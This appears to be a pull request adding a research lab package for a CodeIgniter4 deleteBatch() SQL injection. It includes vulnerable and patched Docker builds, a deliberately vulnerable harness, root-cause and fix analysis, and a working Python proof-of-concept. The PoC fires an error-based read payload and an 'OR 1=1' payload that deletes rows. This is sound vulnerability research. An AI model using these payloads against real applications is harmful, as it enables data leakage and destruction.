### PR TITLE
Add CVE-2026-63221 CodeIgniter4 deleteBatch() SQL Injection

### DIFF
--- a/CVE-2026-63221/Dockerfile.patched
+++ b/CVE-2026-63221/Dockerfile.patched
@@ -1,0 +1,18 @@
+# Pinned to the first fixed release (control build).
+FROM composer:2 AS vendor
+WORKDIR /app
+# codeigniter4/framework 4.7.4 — contains the CVE-2026-63221 fix
+# (commit f5e463b9a3e986389ce285963e51a7f1fab6559f).
+RUN composer require codeigniter4/framework:4.7.4 \
+      --prefer-dist --no-interaction --no-progress --no-scripts --update-no-dev --no-security-blocking --ignore-platform-reqs
+
+FROM php:8.3-cli
+RUN apt-get update \
+    && apt-get install -y --no-install-recommends libicu-dev libonig-dev \
+    && docker-php-ext-install intl mbstring mysqli \
+    && rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+COPY --from=vendor /app/vendor /app/vendor
+COPY app/ /app/
+EXPOSE 8080
+CMD ["php", "-S", "0.0.0.0:8080", "-t", "/app"]

--- a/CVE-2026-63221/Dockerfile.vulnerable
+++ b/CVE-2026-63221/Dockerfile.vulnerable
@@ -1,0 +1,19 @@
+# Pinned to the vulnerable release. Do not substitute a version range.
+FROM composer:2 AS vendor
+WORKDIR /app
+# codeigniter4/framework 4.7.3 — vulnerable per CVE-2026-63221 (>= 4.3.0, < 4.7.4).
+# --no-security-blocking is required: current Composer refuses to install
+# versions flagged by security advisories (this CVE among them).
+RUN composer require codeigniter4/framework:4.7.3 \
+      --prefer-dist --no-interaction --no-progress --no-scripts --update-no-dev --no-security-blocking --ignore-platform-reqs
+
+FROM php:8.3-cli
+RUN apt-get update \
+    && apt-get install -y --no-install-recommends libicu-dev libonig-dev \
+    && docker-php-ext-install intl mbstring mysqli \
+    && rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+COPY --from=vendor /app/vendor /app/vendor
+COPY app/ /app/
+EXPOSE 8080
+CMD ["php", "-S", "0.0.0.0:8080", "-t", "/app"]

--- a/CVE-2026-63221/README.md
+++ b/CVE-2026-63221/README.md
@@ -1,0 +1,67 @@
+# CVE-2026-63221 — CodeIgniter4 deleteBatch() SQL Injection
+
+**Exploit Intelligence Platform** — https://exploit-intel.com
+
+## Vulnerability Summary
+
+| Field | Value |
+|---|---|
+| CVE | CVE-2026-63221 (GHSA-c9w5-rwh3-7pm9) |
+| Component | CodeIgniter4 Query Builder `deleteBatch()` |
+| CWE | CWE-89 — SQL Injection |
+| CVSS | 9.4 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H) |
+| EPSS | 0.377% |
+| Affected versions | 4.3.0 – 4.7.3 |
+| Fix | 4.7.4 (commit f5e463b9a3e986389ce285963e51a7f1fab6559f) |
+| Author | Exploit Intelligence Platform |
+| Date | 2026-08-13 |
+
+## Vulnerability Details
+
+CodeIgniter4's Query Builder `deleteBatch()` substitutes bound values from `where()` conditions into the generated batch-delete SQL while ignoring their escape flags. `BaseBuilder::_deleteBatch()` (and the identical loops in the OCI8 and Postgre driver overrides) rewrote `where()` bind placeholders with `str_replace(':field:', $bind[0], ...)`, injecting the **raw** value. Regular queries escape binds in `Query::matchNamedBinds()`; only the batch-delete path skipped escaping.
+
+Any CodeIgniter4 4.3.0–4.7.3 application that passes request-controlled input into a `deleteBatch()` `where()`/`whereIn()` condition exposes unauthenticated SQL injection inside a DELETE statement.
+
+## Attack Chain
+
+1. Attacker sends a crafted value to an endpoint whose controller calls `->where('col', $input)->deleteBatch(...)`.
+2. The value lands unquoted in the final SQL: `WHERE jobs.name = <raw input>`.
+3. **Read**: `0 AND extractvalue(1,concat(0x7e,version(),0x7e))` leaks database contents through the driver's error channel (demonstrated: DB version extraction).
+4. **Destroy**: `0 OR 1=1` makes the WHERE true for the whole batch scope — a delete intended for matching rows wipes every batched row (demonstrated: 3 rows deleted vs 0).
+
+## Fix Analysis
+
+4.7.4 routes all three affected builders through a shared `BaseBuilder::convertWhereBindsForBatch()` that escapes each bind via `$db->escape()` when its escape flag is set and substitutes atomically with `strtr`. Regression tests cover single binds, multiple binds, and `whereIn()` arrays. Independent review (see `poc_verification_report.md`) found no bypass and no unfixed sibling call sites.
+
+## Lab Run Instructions
+
+Requires Docker with the compose plugin. Everything builds from this directory alone.
+
+```bash
+# 1. Vulnerable lab (CodeIgniter4 4.7.3) on http://127.0.0.1:8080
+docker compose up -d --build
+curl -s http://127.0.0.1:8080/reset          # seed the jobs table
+
+# 2. Run the PoC (Python 3, stdlib only) — expect [SUCCESS]
+python3 poc/poc.py 127.0.0.1 8080
+
+# 3. Patched control (CodeIgniter4 4.7.4) on http://127.0.0.1:8081 — expect [FAILED]
+docker compose -f docker-compose.control.yml -p cve-2026-63221-control up -d --build
+curl -s http://127.0.0.1:8081/reset
+python3 poc/poc.py 127.0.0.1 8081
+
+# 4. Teardown
+docker compose down -v
+docker compose -f docker-compose.control.yml -p cve-2026-63221-control down -v
+```
+
+The lab harness (`app/index.php`) exposes `GET /` (info), `GET /reset` (seed), and `GET /delete-batch?name=<input>` — the last performs the vulnerable `where('jobs.name', <input>)->deleteBatch()` call and returns the generated SQL plus before/after table state as JSON.
+
+## Files
+
+- `intel_brief.md` — EIP intel brief (severity, versions, attribution)
+- `vulnerability_analysis.md` — root-cause trace and fix assessment
+- `poc_verification_report.md` — verdict, 3/3 reproduction ratio, control outcome, BVA summary
+- `lab_build_report.md` — build inputs, ports, acquisition notes
+- `poc/poc.py` — the exploit (Python 3, stdlib only)
+- `Dockerfile.vulnerable`, `Dockerfile.patched`, `docker-compose.yml`, `docker-compose.control.yml`, `app/` — the lab

--- a/CVE-2026-63221/app/Config/Events.php
+++ b/CVE-2026-63221/app/Config/Events.php
@@ -1,0 +1,8 @@
+<?php
+
+declare(strict_types=1);
+
+/*
+ * Minimal stand-in for the appstarter's app/Config/Events.php.
+ * Included by CodeIgniter\Events\Events on boot; no listeners needed.
+ */

--- a/CVE-2026-63221/app/Config/Logger.php
+++ b/CVE-2026-63221/app/Config/Logger.php
@@ -1,0 +1,27 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Config;
+
+use CodeIgniter\Config\BaseConfig;
+use CodeIgniter\Log\Handlers\FileHandler;
+
+/**
+ * Minimal stand-in for the appstarter's app/Config/Logger.php.
+ */
+class Logger extends BaseConfig
+{
+    public int $threshold = 9;
+
+    public string $dateFormat = 'Y-m-d H:i:s';
+
+    public array $handlers = [
+        FileHandler::class => [
+            'handles'         => ['critical', 'alert', 'emergency', 'error', 'warning', 'notice', 'info', 'debug'],
+            'fileExtension'   => 'log',
+            'filePermissions' => 0644,
+            'path'            => '',
+        ],
+    ];
+}

--- a/CVE-2026-63221/app/Config/Modules.php
+++ b/CVE-2026-63221/app/Config/Modules.php
@@ -1,0 +1,14 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Config;
+
+use CodeIgniter\Modules\Modules as CoreModules;
+
+/**
+ * Minimal stand-in for the appstarter's app/Config/Modules.php.
+ */
+class Modules extends CoreModules
+{
+}

--- a/CVE-2026-63221/app/Config/Services.php
+++ b/CVE-2026-63221/app/Config/Services.php
@@ -1,0 +1,13 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Config;
+
+/**
+ * Minimal stand-in for the appstarter's app/Config/Services.php:
+ * the framework's service locator defaults are sufficient for this harness.
+ */
+class Services extends \CodeIgniter\Config\Services
+{
+}

--- a/CVE-2026-63221/app/index.php
+++ b/CVE-2026-63221/app/index.php
@@ -1,0 +1,122 @@
+<?php
+
+declare(strict_types=1);
+
+/*
+ * CVE-2026-63221 lab harness — CodeIgniter4 Query Builder deleteBatch() SQLi.
+ *
+ * Single-file app: framework installed via composer (codeigniter4/framework),
+ * exercised through the standalone database factory. Endpoints:
+ *   GET /               -> info + current jobs rows
+ *   GET /reset          -> drop/create/seed the jobs table
+ *   GET /delete-batch   -> vulnerable call: where('jobs.name', $_GET['name']) + deleteBatch()
+ */
+
+require __DIR__ . '/vendor/autoload.php';
+
+define('ENVIRONMENT', 'production');
+define('CI_DEBUG', false);
+define('ROOTPATH', __DIR__ . DIRECTORY_SEPARATOR);
+define('APPPATH', __DIR__ . DIRECTORY_SEPARATOR);
+define('SYSTEMPATH', __DIR__ . '/vendor/codeigniter4/framework/system/');
+define('WRITEPATH', sys_get_temp_dir() . DIRECTORY_SEPARATOR);
+require __DIR__ . '/Config/Services.php';
+require __DIR__ . '/Config/Logger.php';
+require __DIR__ . '/Config/Modules.php';
+require __DIR__ . '/vendor/codeigniter4/framework/system/Common.php';
+
+use CodeIgniter\Database\Config as DatabaseConfig;
+use CodeIgniter\Database\BaseConnection;
+
+header('Content-Type: application/json');
+
+function db(): BaseConnection
+{
+    static $db = null;
+    if ($db === null) {
+        $db = DatabaseConfig::connect([
+            'hostname' => getenv('DB_HOST') ?: 'db',
+            'username' => getenv('DB_USER') ?: 'ci4',
+            'password' => getenv('DB_PASS') ?: 'ci4',
+            'database' => getenv('DB_NAME') ?: 'ci4lab',
+            'DBDriver' => 'MySQLi',
+            'DBDebug'  => true,
+            'charset'  => 'utf8mb4',
+        ], false);
+    }
+
+    return $db;
+}
+
+function jobsRows(): array
+{
+    return db()->query('SELECT id, name, status FROM jobs ORDER BY id')->getResultArray();
+}
+
+function seedJobs(): void
+{
+    $db = db();
+    $db->query('DROP TABLE IF EXISTS jobs');
+    $db->query('CREATE TABLE jobs (id INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, status VARCHAR(50) NOT NULL)');
+    $db->query("INSERT INTO jobs (name, status) VALUES
+        ('Derek J', 'queued'),
+        ('Ahmadinejad', 'queued'),
+        ('Robert', 'queued'),
+        ('Alice payroll', 'locked'),
+        ('Bob audit', 'locked')");
+}
+
+function respond(array $data, int $code = 200): void
+{
+    http_response_code($code);
+    echo json_encode($data, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES) . "\n";
+}
+
+$action = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH) ?: '/', '/');
+
+try {
+    if ($action === '' ) {
+        respond([
+            'lab'       => 'CVE-2026-63221 CodeIgniter4 deleteBatch() SQLi',
+            'framework' => \CodeIgniter\CodeIgniter::CI_VERSION,
+            'endpoints' => ['/reset', '/delete-batch?name=<input>'],
+            'jobs'      => jobsRows(),
+        ]);
+    } elseif ($action === 'reset') {
+        seedJobs();
+        respond(['reset' => true, 'jobs' => jobsRows()]);
+    } elseif ($action === 'delete-batch') {
+        $name = $_GET['name'] ?? '';
+        $before = jobsRows();
+
+        /*
+         * Vulnerable pattern (CVE-2026-63221): user-controlled value bound via
+         * where() is substituted RAW into the batch-delete WHERE clause on
+         * CodeIgniter4 4.3.0..4.7.3. The batch targets jobs with ids 1..3
+         * (rows 4 and 5 are deliberately outside the batch); the where()
+         * condition is the only filter that is supposed to scope the delete.
+         */
+        $builder = db()->table('jobs');
+        $builder->setData([['id' => 1], ['id' => 2], ['id' => 3]], null, 'data')
+            ->onConstraint(['id' => 'id'])
+            ->where('jobs.name', $name)
+            ->deleteBatch();
+
+        respond([
+            'input'        => $name,
+            'sql'          => (string) db()->getLastQuery(),
+            'affected'     => db()->affectedRows(),
+            'deleted'      => array_values(array_udiff($before, jobsRows(),
+                static fn ($a, $b) => $a['id'] <=> $b['id'])),
+            'remaining'    => jobsRows(),
+            'error'        => null,
+        ]);
+    } else {
+        respond(['error' => 'unknown endpoint'], 404);
+    }
+} catch (Throwable $e) {
+    respond([
+        'error'     => get_class($e) . ': ' . $e->getMessage(),
+        'remaining' => (static function () { try { return jobsRows(); } catch (Throwable) { return null; } })(),
+    ], 500);
+}

--- a/CVE-2026-63221/docker-compose.control.yml
+++ b/CVE-2026-63221/docker-compose.control.yml
@@ -1,0 +1,35 @@
+services:
+  db:
+    image: mariadb:11
+    environment:
+      MYSQL_DATABASE: ci4lab
+      MYSQL_USER: ci4
+      MYSQL_PASSWORD: ci4
+      MYSQL_ROOT_PASSWORD: ci4root
+    healthcheck:
+      test: ["CMD", "mariadb-admin", "ping", "-h", "127.0.0.1", "-uci4", "-pci4"]
+      interval: 5s
+      timeout: 3s
+      retries: 20
+      start_period: 30s
+
+  web:
+    build:
+      context: .
+      dockerfile: Dockerfile.patched
+    depends_on:
+      db:
+        condition: service_healthy
+    environment:
+      DB_HOST: db
+      DB_USER: ci4
+      DB_PASS: ci4
+      DB_NAME: ci4lab
+    ports:
+      - "8081:8080"
+    healthcheck:
+      test: ["CMD-SHELL", "php -r \"$$s = @fsockopen('127.0.0.1', 8080); exit($$s ? 0 : 1);\""]
+      interval: 5s
+      timeout: 3s
+      retries: 10
+      start_period: 15s

--- a/CVE-2026-63221/docker-compose.yml
+++ b/CVE-2026-63221/docker-compose.yml
@@ -1,0 +1,35 @@
+services:
+  db:
+    image: mariadb:11
+    environment:
+      MYSQL_DATABASE: ci4lab
+      MYSQL_USER: ci4
+      MYSQL_PASSWORD: ci4
+      MYSQL_ROOT_PASSWORD: ci4root
+    healthcheck:
+      test: ["CMD", "mariadb-admin", "ping", "-h", "127.0.0.1", "-uci4", "-pci4"]
+      interval: 5s
+      timeout: 3s
+      retries: 20
+      start_period: 30s
+
+  web:
+    build:
+      context: .
+      dockerfile: Dockerfile.vulnerable
+    depends_on:
+      db:
+        condition: service_healthy
+    environment:
+      DB_HOST: db
+      DB_USER: ci4
+      DB_PASS: ci4
+      DB_NAME: ci4lab
+    ports:
+      - "8080:8080"
+    healthcheck:
+      test: ["CMD-SHELL", "php -r \"$$s = @fsockopen('127.0.0.1', 8080); exit($$s ? 0 : 1);\""]
+      interval: 5s
+      timeout: 3s
+      retries: 10
+      start_period: 15s

--- a/CVE-2026-63221/intel_brief.md
+++ b/CVE-2026-63221/intel_brief.md
@@ -1,0 +1,35 @@
+# Intel Brief — CVE-2026-63221
+
+## Overview
+
+| Field | Value |
+|---|---|
+| CVE ID | CVE-2026-63221 |
+| Title | CodeIgniter: SQL injection is possible via Query Builder deleteBatch() when used with where() conditions |
+| Affected software | CodeIgniter4 (PHP full-stack web framework) |
+| Vendor | codeigniter4 |
+| Package | Packagist `codeigniter4/framework` |
+| CVSS | 9.4 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H) |
+| EPSS | 0.377% (percentile 0.307) |
+| CWE | CWE-89 (SQL Injection) |
+| Published | 2026-07-31 |
+| Exploited in the wild | No (SSVC exploitation=none, CISA ADP, 2026-07-31; not in CISA KEV) |
+| Other IDs | GHSA-c9w5-rwh3-7pm9 |
+
+## Affected versions
+
+| Branch | Vulnerable range | Patched version |
+|---|---|---|
+| 4.x | 4.3.0 – 4.7.3 | 4.7.4 |
+
+`deleteBatch()` was introduced in 4.3.0; 4.2.x and earlier do not contain the vulnerable code path.
+
+## Description
+
+CodeIgniter4's Query Builder `deleteBatch()` substitutes bound values from `where()` conditions into the generated batch-delete SQL while ignoring their escape flags. A user-controlled condition value is therefore interpreted as SQL instead of as a string literal. Only the `deleteBatch()` code path is affected; regular `delete()` operations escape `where()` binds correctly. Fixed in 4.7.4 (commit `f5e463b9a3e986389ce285963e51a7f1fab6559f`).
+
+## Root cause (summary)
+
+`CodeIgniter\Database\BaseBuilder::_deleteBatch()` (and the identical loops in the OCI8 and Postgre driver builder overrides) rewrote `where()` binds with `str_replace(':field:', $bind[0], $condition)` — the raw bound value, with the bind's escape flag (`$bind[1]`) ignored. The fix introduces `convertWhereBindsForBatch()`, which escapes each value through `$db->escape()` when the escape flag is set, matching the behavior of `Query::matchNamedBinds()` for regular queries.
+
+_Attribution: severity, version bounds, and references from the EIP corpus record for CVE-2026-63221 (cvelistV5/GitHub_M, GHSA, NVD); root cause verified against the upstream fix commit and tags v4.3.0/v4.7.3/v4.7.4._

--- a/CVE-2026-63221/lab_build_report.md
+++ b/CVE-2026-63221/lab_build_report.md
@@ -1,0 +1,30 @@
+# Lab Build Report — CVE-2026-63221
+
+Record of the pipeline lab build. The publish package ports differ from the pipeline lab ports by design (see below).
+
+## Pipeline lab (~/exploit-intel/labs/CVE-2026-63221/lab/)
+
+| Environment | Project | Host port | URL | Framework |
+|---|---|---|---|---|
+| Vulnerable | cve-2026-63221-lab | 26442 | http://127.0.0.1:26442 | codeigniter4/framework 4.7.3 |
+| Control | cve-2026-63221-control | 26443 | http://127.0.0.1:26443 | codeigniter4/framework 4.7.4 |
+
+Ports derived from the CVE id per the doctrine formula: N=202663221, N%4000=3221, LAB_PORT=20000+3221*2=26442, CONTROL_PORT=26443. Both were free at first `up`; **no port deviation occurred**.
+
+Build inputs (pinned):
+- codeigniter4/framework **v4.7.3** / **v4.7.4** via composer (Packagist); fix commit f5e463b9a3e986389ce285963e51a7f1fab6559f contained only in v4.7.4 (verified `git tag --contains`)
+- base images: `composer:2` (vendor stage), `php:8.3-cli` (runtime), `mariadb:11` (db)
+- harness source: `app/index.php` + `app/Config/*.php` stubs (shipped in this package)
+
+Notes:
+- Composer's default security-advisory policy refuses to install 4.7.3; the Dockerfiles pass `--no-security-blocking` deliberately (we *want* the vulnerable version).
+- A fresh-volume `mariadb:11` init can exceed the default healthcheck grace once; the control/lab compose files use `start_period: 30s` / `retries: 20` to absorb it.
+
+## Publish package (this directory)
+
+| Environment | Compose file | Host port | URL |
+|---|---|---|---|
+| Vulnerable | docker-compose.yml | 8080 | http://127.0.0.1:8080 |
+| Control | docker-compose.control.yml | 8081 | http://127.0.0.1:8081 |
+
+Both compose files are standalone; every COPY source resolves inside this package (`app/`).

--- a/CVE-2026-63221/poc/poc.py
+++ b/CVE-2026-63221/poc/poc.py
@@ -1,0 +1,138 @@
+#!/usr/bin/env python3
+# ──────────────────────────────────────────────────────────────────────
+# Exploit Title  : CodeIgniter4 CodeIgniter4 - SQL injection via Query Builder deleteBatch() where() binds
+# CVE            : CVE-2026-63221
+# Vendor         : codeigniter4
+# Product        : CodeIgniter4
+# Affected       : 4.3.0 - 4.7.3
+# Type           : CWE-89 - Improper Neutralization of Special Elements used in an SQL Command
+# CVSS           : 9.4 (CRITICAL)
+# Platform       : cross-platform (PHP)
+# Author         : Exploit Intelligence Platform
+# Website        : https://exploit-intel.com
+# Twitter        : @exploit_intel
+# Date           : 2026-08-13
+#
+# For authorized security testing and educational purposes only.
+# ──────────────────────────────────────────────────────────────────────
+"""
+CVE-2026-63221 — CodeIgniter4 deleteBatch() SQL injection
+
+CodeIgniter4's Query Builder _deleteBatch() substitutes where() bind values
+RAW into the generated batch-delete SQL, ignoring each bind's escape flag.
+A user-controlled where() value is therefore interpreted as SQL. This PoC
+demonstrates two independent primitives against the lab harness:
+
+ATTACK CHAIN:
+  1. Error-based read: inject `0 AND extractvalue(1,concat(0x7e,version(),0x7e))`
+     into the WHERE predicate; the DB error leaks version() back in the
+     response (proves data extraction from the injected query context).
+  2. Integrity destruction: inject `0 OR 1=1`; the WHERE predicate becomes
+     true for every row in the batch scope, so a delete intended to affect
+     only matching rows wipes the whole batch (3 rows deleted vs 0).
+
+On the patched build (4.7.4) both payloads are escaped to string literals:
+no DB error leaks, 0 rows are deleted, and the PoC prints [FAILED].
+
+Usage: python3 poc/poc.py <host> <port>
+"""
+
+import json
+import re
+import sys
+import urllib.parse
+import urllib.request
+
+READ_PAYLOAD = "0 AND extractvalue(1,concat(0x7e,version(),0x7e))"
+DESTROY_PAYLOAD = "0 OR 1=1"
+
+
+def http_get(url):
+    """Small urllib wrapper that returns (status, body) without raising on 4xx/5xx."""
+    req = urllib.request.Request(url, headers={"User-Agent": "eip-poc/1.0"})
+    try:
+        with urllib.request.urlopen(req, timeout=20) as resp:
+            return resp.status, resp.read().decode("utf-8", "replace")
+    except urllib.error.HTTPError as exc:
+        return exc.code, exc.read().decode("utf-8", "replace")
+
+
+def reset_lab(base):
+    status, body = http_get(f"{base}/reset")
+    if status != 200 or '"reset": true' not in body:
+        print(f"[-] lab reset failed (HTTP {status}): {body[:200]}")
+        sys.exit(2)
+
+
+def fire(base, name_value):
+    """Fire one /delete-batch request and return the decoded JSON body."""
+    qs = urllib.parse.urlencode({"name": name_value})
+    status, body = http_get(f"{base}/delete-batch?{qs}")
+    try:
+        return status, json.loads(body)
+    except json.JSONDecodeError:
+        return status, {"error": f"non-JSON response (HTTP {status}): {body[:200]}"}
+
+
+def exploit(base):
+    ok_read = False
+    ok_destroy = False
+
+    # ── Step 1: error-based read primitive ────────────────────────────
+    # The injected fragment becomes part of the DELETE's WHERE clause.
+    # `name = 0` is true for the seeded string rows (MySQL string->0 cast),
+    # so the AND branch evaluates extractvalue(), whose XPATH error carries
+    # the version() result back to us through DBDebug's exception message.
+    reset_lab(base)
+    status, data = fire(base, READ_PAYLOAD)
+    err = data.get("error") or ""
+    print(f"[*] read payload  : {READ_PAYLOAD}")
+    print(f"[*] server answer : HTTP {status} {err[:160]}")
+    m = re.search(r"XPATH syntax error: '~([^']+?)~?'", err)
+    if m:
+        print(f"[+] read primitive confirmed — extracted DB version: {m.group(1)}")
+        ok_read = True
+    else:
+        print("[-] no version string in the error channel")
+
+    # ── Step 2: integrity destruction primitive ───────────────────────
+    # `0 OR 1=1` lands unquoted: WHERE `jobs`.`name` = 0 OR 1 = 1 is true
+    # for the whole batch scope, so all 3 in-batch rows are deleted where
+    # the application intended only rows matching the supplied name.
+    reset_lab(base)
+    status, data = fire(base, DESTROY_PAYLOAD)
+    deleted = data.get("deleted") or []
+    remaining = data.get("remaining") or []
+    print(f"[*] destroy payload: {DESTROY_PAYLOAD}")
+    print(f"[*] generated SQL  : {(data.get('sql') or '').splitlines()[-1] if data.get('sql') else '(n/a)'}")
+    print(f"[*] affected={data.get('affected')} deleted={len(deleted)} remaining={len(remaining)}")
+    if (
+        len(deleted) == 3
+        and len(remaining) == 2
+        and "OR 1 = 1" in (data.get("sql") or "")
+        and "'0 OR 1" not in (data.get("sql") or "")  # payload quoted => escaped => patched
+    ):
+        names = ", ".join(row["name"] for row in deleted)
+        print(f"[+] integrity impact confirmed — batch filter bypassed, deleted: {names}")
+        ok_destroy = True
+    else:
+        print("[-] injection did not alter the delete scope")
+
+    return ok_read and ok_destroy
+
+
+def main():
+    if len(sys.argv) != 3:
+        print(f"usage: {sys.argv[0]} <host> <port>", file=sys.stderr)
+        sys.exit(2)
+    base = f"http://{sys.argv[1]}:{sys.argv[2]}"
+    print(f"[*] target: {base}")
+
+    if exploit(base):
+        print("[SUCCESS]")
+    else:
+        print("[FAILED]")
+
+
+if __name__ == "__main__":
+    main()

--- a/CVE-2026-63221/poc_verification_report.md
+++ b/CVE-2026-63221/poc_verification_report.md
@@ -1,0 +1,28 @@
+# PoC Verification Report — CVE-2026-63221
+
+## Verdict
+
+**[SUCCESS]** — the packaged PoC (`poc/poc.py`) reproduced SQL injection via CodeIgniter4 Query Builder `deleteBatch()` from cold state on **3/3** cycles against the vulnerable build (4.7.3) and printed `[FAILED]` as expected against the patched control (4.7.4).
+
+## Environment
+
+- Vulnerable: `Dockerfile.vulnerable` — php:8.3-cli, codeigniter4/framework **4.7.3** (composer, pinned), MariaDB 11
+- Control: `Dockerfile.patched` — identical harness with codeigniter4/framework **4.7.4**
+- PoC: Python 3, stdlib only (`urllib`), invoked as `python3 poc.py <host> <port>`
+
+## What the PoC proves
+
+1. **Read primitive** — payload `0 AND extractvalue(1,concat(0x7e,version(),0x7e))` injected into the `deleteBatch()` WHERE predicate leaks the DB version through the driver's XPATH error: `XPATH syntax error: '~11.8.8-MariaDB-ubu2404~'`.
+2. **Integrity destruction** — payload `0 OR 1=1` lands unquoted in the generated SQL (`WHERE jobs.name = 0 OR 1 = 1`), bypassing the intended row filter: all 3 in-batch rows deleted where 0 matched the supplied name.
+
+## Reproduction ratio
+
+**3/3** from cold state (`docker compose down -v` → rebuild → seed → run). One observation is not evidence; three clean cycles are.
+
+## Control-run outcome
+
+Against the patched 4.7.4 build the same PoC prints `[FAILED]`: both payloads are escaped to string literals (`WHERE jobs.name = '0 OR 1 = 1'`), 0 rows deleted, no error-channel leak. The negative comes from the fix, not from missing state — the control environment's build identity and seed were verified in the pre-flight gate before any PoC run.
+
+## Bypass & Variant Analysis (summary)
+
+Five bypass candidates (classic quote breakout, comment obfuscation, backslash escape, case variant, error-based read) were fired at the running patched build; all were neutralized to inert literals — **control held, no bypass demonstrated**. A bounded variant hunt over the fixed source tree found no remaining builder-side raw bind substitution: the three `_deleteBatch` implementations named in the patch were the only occurrences, SQLite3 rejects `where()` in batch deletes outright, and sibling batch methods escape per-value. No new-CVE candidates.

--- a/CVE-2026-63221/vulnerability_analysis.md
+++ b/CVE-2026-63221/vulnerability_analysis.md
@@ -1,0 +1,67 @@
+# Vulnerability Analysis — CVE-2026-63221
+
+## Entrypoint → sink trace
+
+1. **Entrypoint**: application code calls the Query Builder batch delete API:
+   ```php
+   $builder->setData($rows, null, 'data')
+       ->onConstraint(['id' => 'id'])
+       ->where('jobs.name', $userValue)   // user-controlled
+       ->deleteBatch();
+   ```
+2. **Bind registration**: `where()` stores the condition with a named-bind placeholder (`:name:`) in `QBWhere` and registers the value in `$this->binds['name'] = [$value, $escape]` where `$escape` defaults to `true`.
+3. **Sink**: `BaseBuilder::_deleteBatch()` (v4.7.3, `system/Database/BaseBuilder.php` ~line 2932) rewrites the placeholders before compiling the WHERE clause:
+   ```php
+   foreach ($this->QBWhere as $key => $where) {
+       foreach ($this->binds as $field => $bind) {
+           $this->QBWhere[$key]['condition'] = str_replace(':' . $field . ':', $bind[0], $where['condition']);
+       }
+   }
+   ```
+   `$bind[0]` is substituted **raw** — the escape flag `$bind[1]` is never consulted. A value like `anything' OR '1'='1` lands in the final SQL unquoted, yielding `... "jobs"."name" = anything' OR '1'='1`, which turns a narrowly-scoped batch delete into a full-table delete and is a general SQL injection primitive within the DELETE statement.
+4. The same raw-substitution loop was duplicated in the driver overrides `system/Database/OCI8/Builder.php` and `system/Database/Postgre/Builder.php`.
+
+## Why only deleteBatch() is affected
+
+Regular queries pass binds to the database layer where `Query::matchNamedBinds()` escapes each value per its escape flag. Batch operations (`_deleteBatch()`, and analogously `_updateBatch()`/`_insertBatch()` for their set data) pre-substitute binds into the SQL text in the builder itself; the delete-batch path did this substitution without escaping. The batch *data* values are escaped elsewhere in the batch pipeline — it is specifically the `where()` condition binds that were mishandled.
+
+## Fix assessment (commit f5e463b9, released in v4.7.4)
+
+The fix replaces the inline loop in all three builders with a shared `BaseBuilder::convertWhereBindsForBatch()`:
+
+```php
+foreach ($this->binds as $field => $bind) {
+    $escapedValue = $bind[1] ? $this->db->escape($bind[0]) : $bind[0];
+    if (is_array($bind[0])) {
+        $escapedValue = '(' . implode(',', $escapedValue) . ')';
+    }
+    $replacers[':' . $field . ':'] = (string) $escapedValue;
+}
+foreach ($this->QBWhere as $key => $where) {
+    $this->QBWhere[$key]['condition'] = strtr($where['condition'], $replacers);
+}
+```
+
+- Escape flag honored: values escape through the driver's `escape()` (quote + quote-doubling), matching regular-query behavior.
+- `strtr` replaces the repeated `str_replace` loop, avoiding sequential-replacement artifacts when one bind value contains another bind's placeholder name.
+- `whereIn()` array values are parenthesized after per-element escaping.
+- Regression tests in `tests/system/Database/Builder/DeleteTest.php` cover single bind, multiple binds, and `whereIn()` with the payload `anything' OR '1'='1`.
+
+The fix is complete for the described path: all three builder implementations that contained the raw loop now route through the escaping helper.
+
+## Exploitation prerequisites
+
+- Application runs CodeIgniter4 4.3.0–4.7.3.
+- Application calls `deleteBatch()` with `where()`/`whereIn()` conditions built from request-controlled input.
+- No authentication is required by the framework itself; auth posture is application-defined. In the lab, the demo endpoint is unauthenticated to model the CVSS PR:N assessment.
+
+_Extended by branch/PoC stages below._
+
+## Lab confirmation (terminal stage)
+
+[VERIFIED IN LAB] The mechanism was confirmed live against 4.7.3 and 4.7.4:
+
+- 4.7.3: payload `0 OR 1=1` appears unquoted in the generated statement (`WHERE \`jobs\`.\`name\` = 0 OR 1 = 1`) and deletes the entire 3-row batch scope; the benign value `Derek J` causes a syntax error because it too is substituted raw. Error-based extraction (`extractvalue`) leaks `version()` through the XPATH error channel.
+- 4.7.4: the same inputs arrive as quoted, escaped literals (`'0 OR 1 = 1'`); 0 rows affected, no error leak. Benign value deletes exactly the intended row.
+
+Five bypass candidates fired at the patched build (quote breakout, comment obfuscation, backslash escape, case variant, error-based read) were all neutralized — the fix held. A variant hunt over the fixed tree found no remaining builder-side raw bind substitution (see report.md `## Bypass & Variant Analysis`).

--- a/README.md
+++ b/README.md
@@ -105,6 +105,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2025&#8209;24490](CVE-2025-24490/) | **Mattermost Server (Boards Plugin)**<br>SQL Injection (Blind) | **9.6** |
 | [CVE&#8209;2026&#8209;50540](CVE-2026-50540/) | **Kata Containers**<br>Config Path Annotation Arbitrary File Loading to Host Root Exec | **9.6** |
 | [CVE&#8209;2026&#8209;53488](CVE-2026-53488/) | **containerd CRI plugin**<br>Image LABEL Host Command Execution | **9.4** |
+| [CVE&#8209;2026&#8209;63221](CVE-2026-63221/) | **CodeIgniter4 Query Builder `deleteBatch()`**<br>CodeIgniter4 deleteBatch() SQL Injection | **9.4** |
 | [CVE&#8209;2026&#8209;55971](CVE-2026-55971/) | **Apache Thrift**<br>Pre-Auth ZLIB Heap Buffer Overflow Write | **9.3** |
 | [CVE&#8209;2026&#8209;65520](CVE-2026-65520/) | **miniOrange WP OAuth Server**<br><= 6.2.0 SQL Injection | **9.3** |
 | [CVE&#8209;2026&#8209;58154](CVE-2026-58154/) | **Apache Traffic Server**<br>OOB Write in MIME/Header Parsing | **9.2** |
@@ -155,7 +156,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;35414](CVE-2026-35414/) | **OpenSSH**<br>Certificate Principal Matching Authentication Bypass | **N/A** |
